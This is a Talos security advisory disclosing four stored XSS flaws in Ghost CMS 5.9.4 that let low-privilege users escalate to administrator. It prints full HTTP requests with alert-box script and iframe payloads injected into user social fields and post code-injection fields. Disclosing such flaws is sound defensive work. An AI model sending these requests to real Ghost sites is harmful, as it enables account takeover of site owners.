Talos Vulnerability Report

TALOS-2022-1686

Ghost Foundation Ghost Post Creation insecure default installation vulnerability

January 19, 2023
CVE Number

CVE-2022-47197,CVE-2022-47195,CVE-2022-47194,CVE-2022-47196

SUMMARY

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

PRODUCT URLS

Ghost - http://www.ghost.org

CVSSv3 SCORE

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CWE

CWE-453 - Insecure Default Variable Initialization

DETAILS

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create but not publish posts. All users have the ability to include social media links, as well as a few other pieces of information that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged from basic user attacks to full privilege escalation. As with any XSS, it does require a target user with the correct access level to access affected resources while logged in to trigger the injected Javascript. The vulnerabilities listed here can be triggered when a higher level user simply previews or visits any post by the malicious user, as these social links seems to be included in all of a user’s posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct Javascript payload.

Separating the admin domain as documented at https://ghost.org/docs/config/#admin-url will prevent this type of vulnerability from being exploited to perform privileged API calls, such as modifying a user group, adding users, etc. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.

CVE-2022-47194 - Twitter

A stored XSS vulnerability exists in the twitter field for a user.

PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 104
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"users":[{"twitter":"</script><script>alert('XSS')</script>"}]}

CVE-2022-47195 - Facebook

A stored XSS vulnerability exists in the facebook field for a user:

PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 69
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"users":[{"facebook":"</script><script>alert('XSS')</script>"}]}

CVE-2022-47196 - codeinjection_head

A stored XSS vulnerability exists in the codeinjection_head for a post:

POST /ghost/api/admin/posts/ HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 144
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"posts":[{"title":"My Test Post",
"codeinjection_head":"<iframe onload=\"alert('XSS')\" />",
"authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}

CVE-2022-47197 - codeinjection_foot

A stored XSS vulnerability exists in the codeinjection_foot for a post:

POST /ghost/api/admin/posts/ HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 172
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"posts":[{"title":"My Test Post",
"codeinjection_head":null,
"codeinjection_foot":"<iframe onload=\"alert('XSS')\" />",
"authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
TIMELINE

2022-10-26 - Initial Vendor Contact

2022-10-26 - Vendor Disclosure

2022-10-31 - Vendor doesn’t consider issue a security problem

2022-11-22 - Vendor still doesn’t consider the issue a security problem

2023-01-05 - Revised advisory sent to vendor

2023-01-12 - Vendor still doesn’t see issue as security issue

2023-01-19 - Public release

Credit

Discovered by Dave McDaniel of Cisco Talos.